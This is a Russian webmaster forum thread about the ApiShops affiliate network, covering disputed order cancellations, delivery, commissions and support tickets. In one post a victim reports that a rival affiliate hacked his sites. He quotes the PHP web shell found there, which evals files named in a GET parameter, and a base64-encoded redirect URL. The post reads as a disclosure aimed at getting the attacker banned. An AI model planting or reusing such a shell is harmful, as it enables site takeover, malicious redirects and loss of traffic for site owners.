Товарная партнерка №1 ApiShops. RU/UA. Теперь мгновенные прозвоны, быстрая отправка!

Barlog
На сайте с 18.01.2007
287
zlodd:
Я предлагаю следующий Вариант, вы звоните, приносите извинения клиенту и доставляете хомяков клиенту бесплатно, я получаю свой процент! Это не клиент отменил заказ, а это вы не смогли поставить хомяков оговоренного цвета и нагло вписали что это клиент отменил заказ! Вины клиента тут нет!

товару под новый год свойственно заканчиваться. что тут удивительного. смысл бесплатно доставлять, когда это всю наценку убьёт. блин, вот и клиенты бывают такие, вы накосячили - везите бесплатно, мне не нравится товар - приезжайте бесплатно и заберите. что клиенты, что такие партнеры далеко не подарок.

Трафик-менеджер вашему проекту. Только серьезные тематики. Кампании в VK, FB, OK, Direct, Ads, Mytarget
LE
На сайте с 05.09.2013
15

Лежит многостраничник на хостинге Апишопса. У кого-нибудь есть такие проблемы еще?

Регистрация доменов .RU по минимальной цене! (http://www.idomen.ru/37068/)
yogan
На сайте с 10.02.2011
104
Zonk:
Клиенту отправляются неоднократные смс с трек-номером (в т.ч. с текстом что если не заберете то больше не сможете заказывать наложенным платежом) и колл-центр прозванивает всех кто должен забрать посылку неоднократно. Тем, до кого не дозвонились и кто обещает забрать но не забирает - звонят еще раз.

у меня в мск лежит немного заказов в пункте самовывоза, с ноября еще некоторые. На просьбу прозвонить клиентов и напомнить о заказах- в тикетах был ответ

В данный момент у нас нет возможности обзванивать клиентов и напоминать о заказе. Вы можете прозвонить им самостоятельно.

= такая позиция имхо не очень правильная. О доставленных заказах нужно напоминать

У меня особых проблем с ПП не было. но сложилось ощущение что в тикетах порой отвечают люди, которые далеко не полностью владеют ситуацией, имхо ))

>>>до 800$ за лид. ТОП Крипто CPA (https://aivix.com/0004v)<<< >>CPA - Займы, кредиты, мфо , ипотека, лизинг Финансовая парнтерка под RU/UA /СНГ (http://webmaster.leads.su/register?ref_id=4476)<<
Z
На сайте с 26.12.2007
79
Barlog:
товару под новый год свойственно заканчиваться. что тут удивительного. смысл бесплатно доставлять, когда это всю наценку убьёт. блин, вот и клиенты бывают такие, вы накосячили - везите бесплатно, мне не нравится товар - приезжайте бесплатно и заберите. что клиенты, что такие партнеры далеко не подарок.

Вы внимательно прочитали о чем идет разговор?

Еще раз

1. клиенту при звонке курьер сказал что есть только розовые хомяки, изначально был обговорен заказ на коричневые

2. Курьер сказал что доставка будет тогда на следующий день

3. на следующий день позвонили клиенту и сказали что хомяков нет и будут не скоро и задали вопрос вы готовы ждать неопределенное время?

4. после такого вопроса человек отказался

5. у меня появляется запись, что клиент отказался от заказа когда заказ был уже передан курьеру. - это не соответствует действительности! т.к. меня пытаются обмануть о причине отказа! И как заказ может быть доставлен если он уже отменен? Если мне предлагают обратится за компенсацией то я и предлагаю доставить хомяков клиенту. При условии что они нормальные, а не такого вида, как я выложил страницей ранее фото этих "уродов"

Кстати, очень интересно было бы увидеть сертификаты подтверждающие оригинальность этих хомяков!

Так же сам курьер другим клиентам сказал берите розового (люди ждали коричневого) они в отличии от коричневых хотя бы разговаривают.. Это разве нормально?

A7
На сайте с 19.01.2013
51

Подскажите что это значит? Напротив товара ссылка показать (Комиссия) на некоторые товарах при нажатии пустое поле, хотя товар в наличии имеется, почему так что значит это пустое поле, что мне нет комиссии за этот товар или что? На соседний жму показать - показывает комиссию...

Создание сайтов в Нижнем Новгороде ( https://alekseylab.ru/ )
Barlog
На сайте с 18.01.2007
287

zlodd, что значит курьер сказал то, курьер сказал это. действительно что-ли курьер определяет когда будет доставка, согласует замену товара и т.д.? :)

Z
На сайте с 02.10.2008
88

уважаемые партнеры, с сегодняшнего дня в Украине отправляется 100% заказов, размещенных до 19:00 (было до 17-45), в 100% направлений день в день, и уже на следующее утро большинство заказов можно забрать (все областные центры и крупные города, в некоторые отдаленные мелкие города/поселки груз доезжает на второй день).

Кроме того напоминаем, что подтверждение заказа в Украине коллцентром является гарантией того, что товар на складе в наличии и обязательно будет отправлен.

C
На сайте с 19.12.2011
32

Добрый день, всем! Интересная партнерка, но я расскажу любопытную ситуацию как сюда попал.

По порядку, есть вопросы и просьба к представителям пп.

1. Есть ли разница в доменах: apishops.ru и apishops.com (самый безобидный вопрос)?

К делу. Один из Ваших партнеров (далее мошенник) с партнерским номером #19243950 использует недопустимые методы привлечения потенциальных клиентов, а именно:

взламывает сайты и ставит скрытые редиректы на свой лединг (площадку) - bober.apishops.ru

У меня были взломаны более 30 сайтов (расположены на одном аккаунте - не рекомендую) и ставит шелл, примерно такого типа (залит в папку с картинками и замаскирован код .php):

<?php  

if((isset($_GET['forum']))&&($_GET['forum'] != "")){
header('Content-Type: text/html; charset=windows-1251');
$p=$_GET['forum'];
$p = str_replace('..', '', $p);
$p = str_replace('/', '', $p);
echo eval/**/('?>'.join("",file("./uploads/posts/2012-03/thumbs/$p")).'<?');
die;
}
?>

после управляет им, меняя домены и дописывая свои скрипты редиректов (заметает следы) в самое начало страниц сайтов перед <!DOCTYPE html>

Для чего это делается - понятно, и как я вычислил мошенника - упускаю (если нужно, то прошу в личку).

Редирект осуществляется также с домена:

ohlap.ru/redirect.php?url=aHR0cDovL2JvYmVyLmFwaXNob3BzLnJ1

В результате, со временем, все сайты помечаются ПС как вирусные и траф пропадает. Мошенник следит за этим и снимает код (чтобы не палиться), а точнее просто "замораживает" свой шелл.

Я потерял огромную часть своего трафика и соответственно профита, но ведь это мошенник (или гнида) и ему плевать на людей. Тематика и аудитория моих сайтов его мало интересует, он работает на количество.

2. Огромная просьба к Дмитрию Сазонову (или к представителям пп) - проверить и заблокировать аккаунт мошенника, соответственно, без выплат. Его сайт, указанный выше уже блокируется АВ нод32 и помечен как фишинговый.

Если кто в курсе - кто этот "тип" и пострадал подобным образом, то обнародовать его и наказать публично.

Спасибо. Из положительного: нашел хорошую ПП в рамках данного топика. В будущем хочу опробовать.

SunCat
На сайте с 19.08.2013
5
Zonk:
если данный заказ не будет доставлен то вы можете обратиться в тикет за компенсацией.

А что, компенсации реально выплачиваются? а в какой срок?

мне пообещали, но вот уже скоро месяц, как полная тишина по этому вопросу 😒

---------- Добавлено 19.12.2013 в 12:59 ----------

Ребята, еще такой вопрос.

Кто сталкивался уже, подскажите, что происходит с контентом при замене основного товара одностраничника на один из дополнительных?

Очень смущает вот эта фраза: "Внимание! При изменении основного товара для одностраничника все шаблоны будут сброшены на шаблоны по умолчанию и их ручное изменение будет отключено."

Т.е. я не смогу в шаблонах после замены товары ничего сделать? или имеется в виду, что все заново вбивать придется?

У меня хороший поисковый трафик идет, а сейчас товар данного артикула закончился, хочу поменять на другой артикул с аналогичным товаром, но боюсь, что все слетит ((

Тикеты ответ на этот вопрос не дают, поэтому спрашиваю здесь 🙄

Клубные танцы для мужчин (http://vk.cc/27gJie).
LE
На сайте с 05.09.2013
15

Мля...творится какая-то хня на сайте! Набежал народ с "baraholka.leprosorium.ru" и пытается в коментах к хомякам написать всякую чушь )) Не пойму, что за акция такая, кто-нибудь сталкивался? Им можно как-то обрезать вход на сайт (многостраничник)?

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий